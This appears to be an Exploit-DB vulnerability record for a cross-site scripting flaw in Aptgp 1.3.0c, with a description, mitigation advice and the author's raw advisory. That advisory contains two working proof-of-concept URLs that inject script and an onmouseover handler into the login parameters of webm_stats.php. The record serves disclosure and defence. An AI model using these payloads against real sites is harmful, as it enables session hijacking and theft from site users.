Aptgp.v1.3.0c Cross Site Scripting Vulnerability

vendor:

Aptgp

by:

indoushka

7.5

CVSS

HIGH

Cross Site Scripting

CWE

Product Name: Aptgp

Affected Version From: 1.3.0c

Affected Version To: 1.3.0c

Patch Exists: NO

Related CWE: N/A

CPE: a:aptgp:aptgp:1.3.0c

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux

2009

Aptgp.v1.3.0c Cross Site Scripting Vulnerability

Aptgp.v1.3.0c is vulnerable to Cross Site Scripting (XSS) attacks. An attacker can inject malicious JavaScript code into the webm_email parameter of the webm_stats.php page. This code will be executed in the browser of the victim when they visit the page. The malicious code can be used to steal the victim's session cookie, allowing the attacker to hijack the user's session.

Mitigation:

Input validation should be used to prevent XSS attacks. All user-supplied input should be validated and filtered before being used in the application. Additionally, output encoding should be used to prevent malicious code from being executed in the browser.

Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Aptgp.v1.3.0c Cross Site Scripting Vulnerability                        |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       
| # Web Site : www.iq-ty.com                                                           |
| # Script   : Aptgp.v1.3.0c                                                           |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1- http://127.0.0.1/aptgp/webm_stats.php?process=webm_login&webm_email=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&webm_password=hacked-by-indoushka
| 2- http://127.0.0.1/aptgp/webm_stats.php?process=webm_login&webm_email=indoushka@hotmail.com&webm_password="+onmouseover=alert(213771818860)+
|  
================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com  
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)  
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com 
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com 
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com 
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *
-------------------------------------------------------------------------------------------